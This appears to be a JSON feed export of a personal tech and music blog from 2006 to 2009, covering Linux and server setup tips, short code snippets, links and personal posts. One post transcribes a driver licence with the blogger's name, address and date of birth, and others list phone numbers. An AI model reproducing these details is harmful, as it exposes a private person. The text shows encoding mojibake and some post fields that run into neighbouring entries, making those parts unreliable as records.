", "url": "https://blog.x-way.org/Music/2009/02/19/Music-for-a-hard-wake-up-in-the-morning.html", "tags": ["Music"], "date_published": "2009-02-19T17:24:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324144", "title": "The Pirate Bay Trial op-editorial", "content_text": "The trial against The Pirate Bay that started today in Stockholm, Sweden are one of the most important issues of our time. Our adversaries basically wants to close down internets and remodel it into something similar of a sodamachine serving entertainment. During the trial, the prosecutor together with a coterie of representatives for a disabled business model will put up a tacky theater by telling stories designed to convince the court that The Pirate Bay infact is a menace to society.What differs this trial from most earlier trials is that everything in and surrounding it will whirl round and round in diverse channels of communication; to be discussed, reinterpreted, copied and critizised. Every crack in their appeal will be penetrated by the gaze of thousands upon thousands of eyes on the internets, in all the channels covering the trial. Old cliches from the antipiracy lobby wont stick. You wonât be able to say stuff like, âyou canât compete with freeâ or âfilesharing is theftâ without a thousand voices making fun of you.We will create numerous scenes where quite different plays will take place. In local channels like spectrial.bloggy.se where the immediate physical surroundings of the court are being discussed. âWhich cafĂ©s nearby will give us connection?â âHow can we get electricity to the bus?â But also in international channels like Twitter, where right now the torrent of information is being translated into fifteen different languages. Translations and coverage being made by ordinary users of internets. Volunteers sign up to make trial-tourist guides to the surroundings, drive the bus or hook up audio. People fly in from far away countries to cover the trial and tell the world their video story of the Sweden they see.Here all participants are potential actors in the Spectrial. Our channels form a meltingpot of reporting and engagement.Our communication around the spectacle aims in no way towards an objective report on an external chain of events. Rather, the trial is a hub around which a whole new network of actors is instigated. Neither is the spectacle a question of old media against digital, social medias. Our social medias include a paper fanzine and a 32 year old bus, connecting us and others physically.Itâs not about the protocols nor the technology. Itâs about using these to create new congregations, where anyone is invited and anyone can find their role, build new scenes and make their own performances.The future is built by us. Us who participate in conversations. The future is built by us who explore how information and performativity is coming together. To refuse a debate and still expect to be able to charge consumers is since long a closed door. To also try and outlaw certain types of conversations is downright disgraceful.The coverage of the trial is not unique in these qualities. More and more areas see the creation of conversations on and the exploration of new stances on culture and cultural economy. A gigantic collective exploration has set sails. Every route differs from the other. But they have one thing in common: The industry interests that the state is representing are never present in these conversations. This is why they wont be part in building the future.maintain hardline kopimiThe Bureau for Piracy and The Pirate Bayvia the internetsthis article was translated by proud peers of The Pirate Baytrial.thepiratebay.org(via)", "content_html": "The trial against The Pirate Bay that started today in Stockholm, Sweden are one of the most important issues of our time. Our adversaries basically wants to close down internets and remodel it into something similar of a sodamachine serving entertainment. During the trial, the prosecutor together with a coterie of representatives for a disabled business model will put up a tacky theater by telling stories designed to convince the court that The Pirate Bay infact is a menace to society.
What differs this trial from most earlier trials is that everything in and surrounding it will whirl round and round in diverse channels of communication; to be discussed, reinterpreted, copied and critizised. Every crack in their appeal will be penetrated by the gaze of thousands upon thousands of eyes on the internets, in all the channels covering the trial. Old cliches from the antipiracy lobby wont stick. You wonât be able to say stuff like, âyou canât compete with freeâ or âfilesharing is theftâ without a thousand voices making fun of you.
We will create numerous scenes where quite different plays will take place. In local channels like spectrial.bloggy.se where the immediate physical surroundings of the court are being discussed. âWhich cafĂ©s nearby will give us connection?â âHow can we get electricity to the bus?â But also in international channels like Twitter, where right now the torrent of information is being translated into fifteen different languages. Translations and coverage being made by ordinary users of internets. Volunteers sign up to make trial-tourist guides to the surroundings, drive the bus or hook up audio. People fly in from far away countries to cover the trial and tell the world their video story of the Sweden they see.
Here all participants are potential actors in the Spectrial. Our channels form a meltingpot of reporting and engagement.
Our communication around the spectacle aims in no way towards an objective report on an external chain of events. Rather, the trial is a hub around which a whole new network of actors is instigated. Neither is the spectacle a question of old media against digital, social medias. Our social medias include a paper fanzine and a 32 year old bus, connecting us and others physically.
Itâs not about the protocols nor the technology. Itâs about using these to create new congregations, where anyone is invited and anyone can find their role, build new scenes and make their own performances.
The future is built by us. Us who participate in conversations. The future is built by us who explore how information and performativity is coming together. To refuse a debate and still expect to be able to charge consumers is since long a closed door. To also try and outlaw certain types of conversations is downright disgraceful.
The coverage of the trial is not unique in these qualities. More and more areas see the creation of conversations on and the exploration of new stances on culture and cultural economy. A gigantic collective exploration has set sails. Every route differs from the other. But they have one thing in common: The industry interests that the state is representing are never present in these conversations. This is why they wont be part in building the future.
maintain hardline kopimi
The Bureau for Piracy and The Pirate Bay
via the internets
this article was translated by proud peers of The Pirate Baytrial.thepiratebay.org
(via)
", "url": "https://blog.x-way.org/Misc/2009/02/16/The-Pirate-Bay-Trial-op-editorial.html", "tags": ["Misc"], "date_published": "2009-02-16T20:46:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324143", "title": "1234567890", "content_text": "1234567890day.com", "content_html": "", "url": "https://blog.x-way.org/Misc/2009/02/14/1234567890.html", "tags": ["Misc"], "date_published": "2009-02-14T00:31:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324141", "title": "Unicode Snowman", "content_text": "☃via", "content_html": "☃
", "url": "https://blog.x-way.org/Misc/2008/10/09/Unicode-Snowman.html", "tags": ["Misc"], "date_published": "2008-10-09T15:50:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324140", "title": "Use EPFL Exchange on the iPhone / iPod touch", "content_text": "As EPFL is migrating all its E-Mail services to Exchange, lets use the Exchange functionalities of the iPhone/iPod touch.Here's the configuration to make it work:E-Mail: firstname.lastname@epfl.chServer: ewa.epfl.chUsername: studentsusernamePassword: ********************", "content_html": "As EPFL is migrating all its E-Mail services to Exchange, lets use the Exchange functionalities of the iPhone/iPod touch.
Here's the configuration to make it work:
The following definition of an Array works without problems in Safari (and probably Firefox too), but triggers an (legitimate) error in Opera 9.25:
var myArray = [ 1.2, 2.3, 3.4,];
The error is triggered by the superfluous comma after the last element of the Array. It may be argued for both behaviors, but I would prefer all Browsers accepting such an Array definition also since in other languages (C, Python, PHP) such a redundant comma does not cause any trouble.
", "url": "https://blog.x-way.org/Coding/2008/08/09/Opera-925-vs-Safari-JavaScript-syntax-error-forgiveness.html", "tags": ["Coding"], "date_published": "2008-08-09T01:15:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324137", "title": "Fast disk upgrade for my MacBook Pro", "content_text": "Here's how to upgrade the disk of a MacBook Pro in 45 minutes while keeping all your data/settings/applications:Uninstall rEFIt and make sure your MBP restarts with the Apple 'default' bootloaderFollow the iFixit Guide to replace your diskPut the old disk in a SATA-to-USB case (they are available for $7.89 from Newegg.com)Connect the old disk to your MBP and turn the MBP on. (The MBP automagically recognizes the old system and runs it)Open the Disk Manager and partition your new disk.Select your new 'system' Volume and open the \"Restore\" tab.Drag your old 'system' Volume to the \"Source\" field and your new 'system' Volume to the \"Target\" field. Click on \"Restore\", the contents of your old disk are now copied to the new disk.After the restore process finishes, shutdown your MBP.Disconnect your old disk and turn on your MBP.VoilĂ . You are booting from the new disk and all your data/settings/applications are there too!", "content_html": "Here's how to upgrade the disk of a MacBook Pro in 45 minutes while keeping all your data/settings/applications:
void main(){puts(\"Hello World.\\n\");}", "url": "https://blog.x-way.org/Coding/2008/06/25/helloworld-c.html", "tags": ["Coding"], "date_published": "2008-06-25T21:40:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324134", "title": "YYYYYEEEEESSSSSSSSSSSSSSSSSSS", "content_text": "Qu'en est-il de Noir DĂ©sir?On s'est remis au boulot. On projette d'enregistrer un album durant l'hiver prochain… C'est court, mais on a besoin d'une Ă©chĂ©ance pour se structurer.(via)", "content_html": "
Qu'en est-il de Noir DĂ©sir?
On s'est remis au boulot. On projette d'enregistrer un album durant l'hiver prochain… C'est court, mais on a besoin d'une Ă©chĂ©ance pour se structurer.
(via)
", "url": "https://blog.x-way.org/Music/2008/05/09/YYYYYEEEEESSSSSSSSSSSSSSSSSSS.html", "tags": ["Music"], "date_published": "2008-05-09T17:52:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324133", "title": "Vim links", "content_text": "VIM as a Diff/Merge Tool10 Easy Steps to Becoming a Vim Expertvim As A Personal Wiki", "content_html": "", "url": "https://blog.x-way.org/Linux/2008/05/04/Vim-links.html", "tags": ["Linux"], "date_published": "2008-05-04T08:23:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324132", "title": "Sleep deprivation - Sat Rocks On The Second Floor", "content_text": "Right after two nights with 4 hours of sleep in total (Sat Rocks On The Second Floor!), I stumble over this article: Sleep deprivation is not a badge of honor. :-)", "content_html": "Right after two nights with 4 hours of sleep in total (Sat Rocks On The Second Floor!), I stumble over this article: Sleep deprivation is not a badge of honor. :-)
", "url": "https://blog.x-way.org/Misc/2008/05/02/Sleep-deprivation---Sat-Rocks-On-The-Second-Floor.html", "tags": ["Misc"], "date_published": "2008-05-02T15:25:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324131", "title": "Seems people don't read enough books", "content_text": "Coding Horror: Programmers Don't Read Books -- But You Should", "content_html": "Coding Horror: Programmers Don't Read Books -- But You Should
", "url": "https://blog.x-way.org/Coding/2008/04/30/Seems-people-dont-read-enough-books.html", "tags": ["Coding"], "date_published": "2008-04-30T14:23:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324130", "title": "Gigabyte U7000 USB DTV DVB-T and Ubuntu (8.04)", "content_text": "sudo apt-get install kaffeine dvb-utils mercurial linux-headers-$(uname -r) build-essentialhg clone http://linuxtv.org/hg/v4l-dvbcd v4l-dvbsudo makesudo make installIf you're using another flavor of Linux or Ubuntu you may be missing the firmware file, you can get it here.", "content_html": "sudo apt-get install kaffeine dvb-utils mercurial linux-headers-$(uname -r) build-essential
hg clone http://linuxtv.org/hg/v4l-dvb
cd v4l-dvb
sudo make
sudo make install
If you're using another flavor of Linux or Ubuntu you may be missing the firmware file, you can get it here.
", "url": "https://blog.x-way.org/Linux/2008/04/28/Gigabyte-U7000-USB-DTV-DVB-T-and-Ubuntu-804.html", "tags": ["Linux"], "date_published": "2008-04-28T20:45:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324129", "title": "Musikverwaltung unter Linux", "content_text": "Pro-Linux: Musikverwaltung unter Linux, ein Vergleich verschiedener Programme", "content_html": "Pro-Linux: Musikverwaltung unter Linux, ein Vergleich verschiedener Programme", "url": "https://blog.x-way.org/Linux/2008/04/28/Musikverwaltung-unter-Linux.html", "tags": ["Linux"], "date_published": "2008-04-28T11:01:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324128", "title": "Python (S60) links", "content_text": "Using Python to create UNIX command line toolsPyS60 Emulation Library, unlike the Nokia Emulator, this one also works on Mac OS X and Linux!Wlan Scanning module for PyS60. There is also an extended GSM location module to get more information (Technology used, Name of Operator, Network Mode, …) than with the Nokia one.", "content_html": "ImageFlow, CoverFlow mit JavaScript. (via)
", "url": "https://blog.x-way.org/Webdesign/2008/04/21/ImageFlow.html", "tags": ["Webdesign"], "date_published": "2008-04-21T21:31:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324126", "title": "Mibbit.com - Web-IRC-Client", "content_text": "Mibbit.com provides an IRC webinterface, so you can hang around in your favorite channels with your iPhone/PDA/fridge/whatever.", "content_html": "Mibbit.com provides an IRC webinterface, so you can hang around in your favorite channels with your iPhone/PDA/fridge/whatever.
", "url": "https://blog.x-way.org/Networking/2008/04/21/Mibbit-com-Web-IRC-Client.html", "tags": ["Networking"], "date_published": "2008-04-21T21:21:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324125", "title": "Ten Thousand Cents", "content_text": "http://www.tenthousandcents.com/", "content_html": "http://www.tenthousandcents.com/", "url": "https://blog.x-way.org/Misc/2008/04/15/Ten-Thousand-Cents.html", "tags": ["Misc"], "date_published": "2008-04-15T21:18:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324124", "title": "Using the X11 clipboard on the commandline", "content_text": "XSel gives easy commandline access to the X11 clipboard (primary & secondary).", "content_html": "XSel gives easy commandline access to the X11 clipboard (primary & secondary).
", "url": "https://blog.x-way.org/Linux/2008/03/25/Using-the-X11-clipboard-on-the-commandline.html", "tags": ["Linux"], "date_published": "2008-03-25T14:27:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324123", "title": "Unix Toolbox", "content_text": "Unix Toolbox, a nice collection of Unix/Linux/BSD commands, may be useful for advanced users.", "content_html": "Unix Toolbox, a nice collection of Unix/Linux/BSD commands, may be useful for advanced users.
", "url": "https://blog.x-way.org/Linux/2008/03/23/Unix-Toolbox.html", "tags": ["Linux"], "date_published": "2008-03-23T16:36:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324122", "title": "CHALLENGE", "content_text": "Don't ask.", "content_html": "Don't ask.
", "url": "https://blog.x-way.org/Misc/2008/03/05/CHALLENGE-08.html", "tags": ["Misc"], "date_published": "2008-03-05T00:00:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324121", "title": "Too much time for party", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Misc/2008/02/21/Too-much-time-for-party.html", "tags": ["Misc"], "date_published": "2008-02-21T13:40:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324119", "title": "Some Links II", "content_text": "Python main() functionsJavascript without IFs, WHILEs, or FORsgrep in 98 lines of code", "content_html": "", "url": "https://blog.x-way.org/Coding/2008/02/15/Some-Links-2-15-8.html", "tags": ["Coding"], "date_published": "2008-02-15T08:53:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324120", "title": "Python Webserver in 1 or 15 lines", "content_text": "Python Webserver in 1 line:python -c \"import SimpleHTTPServer; SimpleHTTPServer.test()\"Python Webserver in 15 lines:import BaseHTTPServerclass WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): if self.path == '/foo': self.send_response(200) self.do_something() else: self.send_error(404) def do_something(self): print 'hello world' server = BaseHTTPServer.HTTPServer(('',80), WebRequestHandler)server.serve_forever()via", "content_html": "Python Webserver in 1 line:
python -c \"import SimpleHTTPServer; SimpleHTTPServer.test()\"
Python Webserver in 15 lines:
import BaseHTTPServerclass WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): if self.path == '/foo': self.send_response(200) self.do_something() else: self.send_error(404) def do_something(self): print 'hello world' server = BaseHTTPServer.HTTPServer(('',80), WebRequestHandler)server.serve_forever()", "url": "https://blog.x-way.org/Coding/2008/02/14/Python-Webserver-in-1-or-15-lines.html", "tags": ["Coding"], "date_published": "2008-02-14T21:10:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324118", "title": "Some Links", "content_text": "RegexPal, a JavaScript regular expression testerNamespacing your JavaScriptIn Vim Marks visualisieren", "content_html": "
And now, how to un-brick it again:
<object type=\"application/x-shockwave-flash\" data=\"flash.swf\" width=\"100\" height=\"200\"><param name=\"movie\" value=\"flash.swf\" /></object>", "url": "https://blog.x-way.org/Webdesign/2008/01/12/Embed-Flash-into-valid-XHTML-documents.html", "tags": ["Webdesign"], "date_published": "2008-01-12T17:12:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324113", "title": "How to enable IPv6 on your Debian Linux server in 3 easy steps", "content_text": "Compute your 6to4 IPv6 address (2002:uuuu:vvvv::1) from your IPv4 address (a.b.c.d): printf \"2002:%02x%02x:%02x%02x::1\\n\" a b c dAdd a SIT (IPv6-in-IPv4) interface in /etc/network/interfaces:auto sit0iface sit0 inet6 static address 2002:uuuu:vvvv::1 netmask 64 gateway ::192.88.99.1ifup sit0Now you can also add AAAA DNS records with 2002:uuuu:vvvv::1 for your domain(s).", "content_html": "
printf \"2002:%02x%02x:%02x%02x::1\\n\" a b c d
auto sit0iface sit0 inet6 static address 2002:uuuu:vvvv::1 netmask 64 gateway ::192.88.99.1
ifup sit0
Now you can also add AAAA DNS records with 2002:uuuu:vvvv::1 for your domain(s).
", "url": "https://blog.x-way.org/Networking/2008/01/09/How-to-enable-IPv6-on-your-Debian-Linux-server-in-3-easy-steps.html", "tags": ["Networking"], "date_published": "2008-01-09T16:00:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324110", "title": "Breakout Game written in sed", "content_text": "Instead of learning for the exams, I mess around with strange things:arkanoid.sed is a breakout-game written entirely in sed. Download the sed-file and use sed -f arkanoid.sed to start the game. (via)", "content_html": "Instead of learning for the exams, I mess around with strange things:
arkanoid.sed is a breakout-game written entirely in sed. Download the sed-file and use sed -f arkanoid.sed
to start the game. (via)
I really, really should have known the * command earlier.
", "url": "https://blog.x-way.org/Coding/2008/01/02/7-Habits-For-Effective-Text-Editing-2-0.html", "tags": ["Coding"], "date_published": "2008-01-02T10:40:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324107", "title": "Erlang has no locks and no keys.", "content_text": "Erlang processes don't share memory, so there is no need to lock the memory while it is being used. Where there are locks, there are keys that can get lost. What happens when you lose your keys? You panic and don't know what to do. That's what happens in software systems when you lose your keys and your locks go wrong.Distributed software systems with locks and keys always go wrong.Erlang has no locks and no keys.Joe Armstrong, Programming Erlang", "content_html": "Erlang processes don't share memory, so there is no need to lock the memory while it is being used. Where there are locks, there are keys that can get lost. What happens when you lose your keys? You panic and don't know what to do. That's what happens in software systems when you lose your keys and your locks go wrong.
Distributed software systems with locks and keys always go wrong.
Erlang has no locks and no keys.
Joe Armstrong, Programming Erlang
", "url": "https://blog.x-way.org/Coding/2007/12/23/Erlang-has-no-locks-and-no-keys.html", "tags": ["Coding"], "date_published": "2007-12-23T23:12:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324106", "title": "Won't you blog about this song?", "content_text": "(via)", "content_html": "(via)
", "url": "https://blog.x-way.org/Misc/2007/12/05/Wont-you-blog-about-this-song.html", "tags": ["Misc"], "date_published": "2007-12-05T01:02:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324104", "title": "Enforce HTTPS for your virtualhosts", "content_text": "NameVirtualHost *:443NameVirtualHost *:80<VirtualHost *:80>\tServerName example.org\tRewriteEngine on\tRewriteRule ^(.*)$ https://%{SERVER_NAME}$1 [L,R]</VirtualHost><VirtualHost *:443>\tServerName example.org\tDocumentRoot /var/www/example.org\t...</VirtualHost>", "content_html": "NameVirtualHost *:443NameVirtualHost *:80<VirtualHost *:80>\tServerName example.org\tRewriteEngine on\tRewriteRule ^(.*)$ https://%{SERVER_NAME}$1 [L,R]</VirtualHost><VirtualHost *:443>\tServerName example.org\tDocumentRoot /var/www/example.org\t...</VirtualHost>", "url": "https://blog.x-way.org/Linux/2007/09/16/Enforce-HTTPS-for-your-virtualhosts.html", "tags": ["Linux"], "date_published": "2007-09-16T14:13:49+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324103", "title": "California driving test: passed!", "content_text": "I passed the California driving test this afternoon, now the streets are no longer safe :-)The interim driver license looks really shabby, it's just this text printed on cheap copier paper: INTERIM DRIVER LICENSE DXXXXXXX CLASS C ISSUED:07-25-07 XXX XX/XX EXPIRES:09-22-07ANDREAS RENE JAGGI SEX:M HAIR:BRN EYES:HZL900 ISLAND DR STE 101 HT:5-11 WT:187 DOB:01-22-84REDWOOD CITY CA 94065 THIS LICENSE IS ISSUED AS A LICENSE TO DRIVE A MOTOR VEHICLE; IT DOES NOT ESTABLISH ELIGIBILITY FOR EMPLOYMENT, VOTER REGISTRATION, OR PUBLIC BENEFITS.Also the driving test itself was more like a joke than a real test. I just had to drive around for about 10 minutes. No highway driving, no complicated intersections, no 'advanced' maneuvers, no real parallel parking. In fact the \"parallel parking\" part was to pull over to the curb and drive backwards 3 meters (w/o any other car around of course). And the most complicated maneuvers were to change lanes and to make a left turn at an intersection.", "content_html": "
I passed the California driving test this afternoon, now the streets are no longer safe :-)
The interim driver license looks really shabby, it's just this text printed on cheap copier paper:
INTERIM DRIVER LICENSE DXXXXXXX CLASS C ISSUED:07-25-07 XXX XX/XX EXPIRES:09-22-07ANDREAS RENE JAGGI SEX:M HAIR:BRN EYES:HZL900 ISLAND DR STE 101 HT:5-11 WT:187 DOB:01-22-84REDWOOD CITY CA 94065 THIS LICENSE IS ISSUED AS A LICENSE TO DRIVE A MOTOR VEHICLE; IT DOES NOT ESTABLISH ELIGIBILITY FOR EMPLOYMENT, VOTER REGISTRATION, OR PUBLIC BENEFITS.
Also the driving test itself was more like a joke than a real test. I just had to drive around for about 10 minutes. No highway driving, no complicated intersections, no 'advanced' maneuvers, no real parallel parking. In fact the \"parallel parking\" part was to pull over to the curb and drive backwards 3 meters (w/o any other car around of course). And the most complicated maneuvers were to change lanes and to make a left turn at an intersection.
", "url": "https://blog.x-way.org/Misc/2007/07/25/California-driving-test-passed.html", "tags": ["Misc"], "date_published": "2007-07-25T20:10:05+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324102", "title": "Bicycle stolen!", "content_text": "This afternoon some asshole has stolen my bicycle.I left it locked to the bike rack at the Hillsdale Caltrain station for 5 hours while I went shopping in SF. And now it's gone :-(Of course I called the police, but even the deputy sheriff of San Mateo county said that I will probably never see my bike again.So if you happen to find or see a bicycle with the following characteristics, please tell me (650.888.0140) or report to the police.Serial#IDC07B22590 BrandGTModelAvalanche 3.0 (2007)ColorblackSizeXL", "content_html": "This afternoon some asshole has stolen my bicycle.
I left it locked to the bike rack at the Hillsdale Caltrain station for 5 hours while I went shopping in SF. And now it's gone :-(
Of course I called the police, but even the deputy sheriff of San Mateo county said that I will probably never see my bike again.
So if you happen to find or see a bicycle with the following characteristics, please tell me (650.888.0140) or report to the police.
Serial# | IDC07B22590 |
Brand | GT |
Model | Avalanche 3.0 (2007) |
Color | black |
Size | XL |
Robert will zum Wochenende noch ein paar Fakten sehen:
Mal schauen ob Andreas oder Gordon was ĂŒber sich erzĂ€hlen wollen.
", "url": "https://blog.x-way.org/Misc/2007/02/10/Kuriose-Fakten-ueber-mich.html", "tags": ["Misc"], "date_published": "2007-02-10T00:25:52+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324100", "title": "Jamendo rocks!", "content_text": "Jamendo playlist", "content_html": "", "url": "https://blog.x-way.org/Music/2007/02/09/Jamendo-rocks.html", "tags": ["Music"], "date_published": "2007-02-09T09:04:19+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324099", "title": "Chambre Ă louer Ă Vufflens-la-ville", "content_text": "A Vufflens-la-Ville (10 min. en voiture de l'EPFL, 45 min. en train), à louer du 10 mars au 15 septembre 2007 une chambre meublée indépendante de 32 m2 avec coin cuisine et ADSL, située dans une ancienne ferme habitée par une famille (salle d'eau en commun, possibilité d'utiliser le jardin), pour 530 francs par mois, charges comprises.Tél. de préférence le soir au 021'701'14'61 ou au 078'645'56'83.", "content_html": "A Vufflens-la-Ville (10 min. en voiture de l'EPFL, 45 min. en train), à louer du 10 mars au 15 septembre 2007 une chambre meublée indépendante de 32 m2 avec coin cuisine et ADSL, située dans une ancienne ferme habitée par une famille (salle d'eau en commun, possibilité d'utiliser le jardin), pour 530 francs par mois, charges comprises.
Tél. de préférence le soir au 021'701'14'61 ou au 078'645'56'83.
Je me rapelle ces cellules vides
Tout petits bouts de vie sordides
Je passe ma journée à attendre
Que quelqu'un tente de la comprendre
Il vaut mieux apprendre à mentir
Se supporter tant mal que pire
Mieux vaut apprendre à oublier
Que tous les jours faut se lever
Trouver la force d'y croire encore
Quand tout notre corps hurle "assez"
Sourire à des gens inconnus
Quand ceux qu'on aime ne sourient plus
Dans la galerie de nos amours perdues
Se souvenir que l'on n'est rien
Qu'un paranthèse dans le destin
Sous-particule du genre humain
Et ces journées sont toutes les mêmes
Avec nos peurs et nos "je t'aime"
Avec cette solitude amère
On vit – on meurt et on espère
Une dernière lettre abandonée
Du rouge à lèvres sur un café
N'importe quoi pour oublier
Que tous les jours faut se lever…
(Glardon/Melatonin)
Cette chanson décrit pas mal les trois semaines que je viens de passer à l'armée
Heute jedenfalls: um meine Linksammlung in Zukunft besser vor Spammern zu schĂŒtzen, habe ich Scuttle ein bisschen erweitert:
Um den Adminbereich nutzen zu können muss in der Datenbank noch ein Feld uAdmin
vom Typ TINYINT(1)
zur Tabelle sc_users
hinzugefĂŒgt werden. Danach dieses einfach auf 1
setzen um einen Benutzer zum Administrator zu machen.
Thanks to this (really simple) tutorial from debian-administration.org I managed to enable SSL on my server. Thus links.x-way.org is available via HTTPS.
If you run a server without SSL, please take two minutes and enable it.
Your users will be thankfull for their protected privacy.
Heute wurde meine mit Scuttle funktionierende Linksammlung von einem Spammer heimgesucht.
Resultat: rund 10'000 Spamlinks und etwa dreimal soviele Spamtags.
GlĂŒcklicherweise lĂ€sst sich das mit nur drei SQL Befehlen entfernen:
spammer-uId ausfindig machen und entsprechenden User löschen
DELET FROM sc_users WHERE uID = spammer-uId
Spamtags löschen
DELETE FROM sc_tags WHERE bId IN (SELECT bId FROM sc_bookmarks WHERE uId = spammer-uId)
Spamlinks löschen
DELETE FROM sc_bookmarks WHERE uId = spammer-uId
", "url": "https://blog.x-way.org/Misc/2006/08/16/Bachelor.html", "tags": ["Misc"], "date_published": "2006-08-16T11:56:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324093", "title": "httphead.c", "content_text": "Da es mir gestern Abend etwas langweilig war, habe ich mich ein bisschen im C Programmieren geĂŒbt, schliesslich sollte ich darin fit sein wenn ich im Herbst mein Semesterprojekt beginne.Dabei ist ein kleines Programm entstanden, das den HTTP-Header einer Website ausgibt: httphead.c ", "content_html": "Vu ces résultats, le Bachelor of Science BSc en informatique lui est décerné.
In consideration of these results the candidate is awarded the "Bachelor of Science BSc in Computer Science"
Da es mir gestern Abend etwas langweilig war, habe ich mich ein bisschen im C Programmieren geĂŒbt, schliesslich sollte ich darin fit sein wenn ich im Herbst mein Semesterprojekt beginne.
Dabei ist ein kleines Programm entstanden, das den HTTP-Header einer Website ausgibt: httphead.c
", "url": "https://blog.x-way.org/Coding/2006/08/13/httpheadc.html", "tags": ["Coding"], "date_published": "2006-08-13T15:40:34+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324092", "title": "No more trackback (spam)", "content_text": "Gestern wurde mir mitgeteilt, dass mein trackback.php Script den Server zum Absturz gebracht hat!Das erstaunt mich nicht besonders, da ich hier in letzter Zeit immer stĂ€rker mit Trackback-Spam bombardiert werde und der schĂŒtzende Bayesian Spam-Filter nicht gerade sehr ressourcenschonend arbeitet.Also gibt's ab jetzt hier keine Trackback-UnterstĂŒtzung mehr. Aufrufe von trackback.php werden mit 410 oder 403 beantwortet!", "content_html": "Gestern wurde mir mitgeteilt, dass mein trackback.php Script den Server zum Absturz gebracht hat!
Das erstaunt mich nicht besonders, da ich hier in letzter Zeit immer stĂ€rker mit Trackback-Spam bombardiert werde und der schĂŒtzende Bayesian Spam-Filter nicht gerade sehr ressourcenschonend arbeitet.
Also gibt's ab jetzt hier keine Trackback-UnterstĂŒtzung mehr. Aufrufe von trackback.php werden mit 410 oder 403 beantwortet!
", "url": "https://blog.x-way.org/Misc/2006/08/13/No-more-trackback-spam.html", "tags": ["Misc"], "date_published": "2006-08-13T15:20:21+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324091", "title": "LĂ€nder Stöckchen", "content_text": "Eigentlich sollte ich ja fĂŒr die PrĂŒfungen lernen und nicht vor dem Computer sitzen. Aber wenn die Motivation nicht da ist kann man nichts machen ;-)Und dann wirft mir Markus auch noch ein Stöckchen zu. Danke, noch eine Ausrede mehr um mich vom Lernen abzuhalten :-)Wie man sieht bin ich als Student noch nicht so viel in der Welt rumgekommen.Das Stöckchen gebe ich an Robert, Gordon und Marc weiter.Die Karten kann man sich bei world66.com generieren lassen.Voilà!", "content_html": "Eigentlich sollte ich ja fĂŒr die PrĂŒfungen lernen und nicht vor dem Computer sitzen. Aber wenn die Motivation nicht da ist kann man nichts machen ;-)
Und dann wirft mir Markus auch noch ein Stöckchen zu. Danke, noch eine Ausrede mehr um mich vom Lernen abzuhalten :-)
Wie man sieht bin ich als Student noch nicht so viel in der Welt rumgekommen.
Das Stöckchen gebe ich an Robert, Gordon und Marc weiter.
Die Karten kann man sich bei world66.com generieren lassen.
Voilà!
Via EDV.
", "url": "https://blog.x-way.org/Misc/2006/07/02/Four-rings.html", "tags": ["Misc"], "date_published": "2006-07-02T15:39:15+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324089", "title": "Back in Black", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Misc/2006/06/25/Back-in-Black.html", "tags": ["Misc"], "date_published": "2006-06-25T23:40:31+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324088", "title": "Configuring Exim4 and Courier IMAP under Debian GNU/Linux", "content_text": "Today I finally installed a mail transfer agent/mail delivery agent on my server.I quickly looked at the most popular applications for such a job (Exim, Postfix and qmail) and choosed Exim 4 (especially because it's the only one which is 'real' opensource).Then I searched a Howto or tutorial on Google, but most results were not really useful. For example the Exim 4 Howto from debianhowto.de like many others disappointed me a bit since they don't give any advice on configuring Exim. But after some evolution and mutation of the search string I finally found a very good guide.Configuring Exim4 and Courier IMAP under Debian GNU/Linux from Jason Boxman helped me to set up Exim step by step. Not also he explains how to install Exim but he also shows how to interact with Courier IMAP and how to secure all transfers with SSL.I can only recommend you this guide if you want to install Exim 4 on a Debian system.", "content_html": "Today I finally installed a mail transfer agent/mail delivery agent on my server.
I quickly looked at the most popular applications for such a job (Exim, Postfix and qmail) and choosed Exim 4 (especially because it's the only one which is 'real' opensource).
Then I searched a Howto or tutorial on Google, but most results were not really useful. For example the Exim 4 Howto from debianhowto.de like many others disappointed me a bit since they don't give any advice on configuring Exim. But after some evolution and mutation of the search string I finally found a very good guide.
